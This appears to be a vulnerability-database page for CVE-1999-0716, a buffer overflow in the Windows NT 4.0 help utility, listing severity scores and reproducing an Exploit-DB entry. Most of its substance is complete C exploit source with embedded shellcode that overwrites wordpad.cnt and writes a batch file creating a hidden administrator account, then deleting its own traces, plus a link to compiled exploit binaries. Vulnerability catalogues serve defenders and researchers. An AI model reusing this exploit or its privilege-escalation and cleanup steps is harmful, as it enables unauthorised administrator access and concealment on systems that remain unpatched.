CVE-1999-0716 : Detail

CVE-1999-0716

0.05%V3
Local
2000-01-04
04h00 +00:00
2024-08-01
16h48 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in Windows NT 4.0 help file utility via a malformed help file.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 19209

Publication date : 1999-05-16 22h00 +00:00
Author : David Litchfield
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/261/info // // Lax permission in the Windows NT help file folder and a buffer overflow in the Help utility may allow malicious users to gain Administrator privileges. // // The Windows NT Help utility parses and displays help information for selected applications. The help files are stored in the %SystemRoot%\help directory. The default permissions in this directory allow any user to add new files. // // A buffer overflow exists in the Help utility when it attempts to read a .cnt file with an overly long heading string. Content tab informaton files ("".cnt"") are generated when rich text format files ("".rtf"") are translated to help files ("".hlp""). If the string is longer than 507 bytes winhlp32 truncates the entry and the buffer overflow does not occur. // // A malicious user can create a custom .cnt help file with executable code in an entry string which when stored in the help directory and viewed by an unsuspecting user can grant them that users privileges. // // The vulnerability is not limited by the permissions of the help file directory as the Help utility will search for a .cnt file first in its execution directory before looking in the help file directory. // #include <stdio.h> #include <windows.h> #include <string.h> int main(void) { char eip[5]=""\xE5\x27\xF3\x77""; char ExploitCode[200]=""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\x1A\x38\xF1\x77\x52\x8D\x45\xF4\x50\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x41\xC6\x45\xFD\x44\xC6\x45\xFE\x44\xB8\xE1\xE1\xA0\x77\x50\x8D\x45\xFC\x50\xFF\x55\xF8\x55\x8B\xEC\xBA\xBA\x5B\x9F\x77\x52\x33\xC0\x50\xFF\x55\xFC""; FILE *fd; printf(""\n\n*******************************************************\n""); printf(""* WINHLPADD exploits a buffer overrun in Winhlp32.exe *\n""); printf(""* This version runs on Service Pack 4 machines and *\n""); printf(""* assumes a msvcrt.dll version of 4.00.6201 *\n""); printf(""* *\n""); printf(""* (C) David Litchfield ([email protected]) '99 *\n""); printf(""*******************************************************\n\n""); fd = fopen(""wordpad.cnt"", ""r""); if (fd==NULL) { printf(""\n\nWordpad.cnt not found or insufficient rights to access it.\nRun this from the WINNT\\HELP directory""); return 0; } fclose(fd); printf(""\nMaking a copy of real wordpad.cnt - wordpad.sav\n""); system(""copy wordpad.cnt wordpad.sav""); printf(""\n\nCreating wordpad.cnt with exploit code...""); fd = fopen(""wordpad.cnt"", ""w+""); if (fd==NULL) { printf(""Failed to open wordpad.cnt in write mode. Check you have sufficent rights\n""); return 0; } fprintf(fd,""1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%s%s\n"",eip,ExploitCode); fprintf(fd,""2 Opening a document=WRIPAD_OPEN_DOC\n""); fclose(fd); printf(""\nCreating batch file add.bat\n\n""); fd = fopen(""add.bat"", ""w""); if (fd == NULL) { printf(""Couldn't create batch file. Manually create one instead""); return 0; } printf(""The batch file will attempt to create a user account called \""winhlp\"" and\n""); printf(""with a password of \""winhlp!!\"" and add it to the Local Administrators group.\n""); printf(""Once this is done it will reset the files and delete itself.\n""); fprintf(fd,""net user winhlp winhlp!! /add\n""); fprintf(fd,""net localgroup administrators winhlp /add\n""); fprintf(fd,""del wordpad.cnt\ncopy wordpad.sav wordpad.cnt\n""); fprintf(fd,""del wordpad.sav\n""); fprintf(fd,""del add.bat\n""); fclose(fd); printf(""\nBatch file created.""); printf(""\n\nCreated. Now open up Wordpad and click on Help\n""); return 0; } NOTE: The attached exploit code has been compiled to run on Windows NT 4.0 SP4 with msvcrt.dll version 4.20.6201 https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19209.tar.gz

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_nt >> Version *

Microsoft>>Windows_nt >> Version 4.0

References